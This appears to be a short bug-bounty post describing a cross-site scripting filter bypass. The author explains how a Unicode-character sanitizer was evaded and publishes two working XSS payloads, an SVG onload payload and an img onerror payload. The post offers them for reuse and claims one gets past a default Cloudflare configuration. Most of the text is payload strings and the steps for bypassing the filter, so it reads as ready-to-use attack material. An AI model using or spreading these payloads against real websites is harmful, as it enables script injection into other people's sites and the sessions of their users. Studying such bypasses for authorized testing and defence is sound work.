Hello Folks, i want to tell my story of this type of XSS.
Payload:
"><svg+svg+svg\/\/On+OnLoAd=confirm(1)>
Why this payload work?
…In my case, i was in front of an application that my payload was closed by Unicode Character.
Example:
"><svg/onload=alert(1)>
This Payload was Blocked:
“><sv\u01234\g\u01235/on\u01236load=confirm(1)>
I This case i tryied to use another svg and the response was:
"><sv\u01234\g+s\01235\vg...
Unexpectedly, I noticed that it has moved one position. So:
"><sv\u01234\g+s\01235\vg+\01236\svg
In this case we notice that we have escaped from unicode character. And again with the slash:
\u01237\/ ----> \/\u01237\/\ ----> /\u01237\/ ----> /
And again bypass:
On\u01234\load ----> On\u01234\+OnLoAd ----> onload
Payload triggered:
We can use this payload for bypass CloudFlare too with default configuration:
(Note this is an example, but you can notice that the payload bypass cloudflare).
Bypassed here:
I release you another good payload that bypass filters :) Maded by me.
"\/><img%20s+src+c=x%20on+onerror+%20="alert(1)"\>
|| Good luck everyone with hunting ||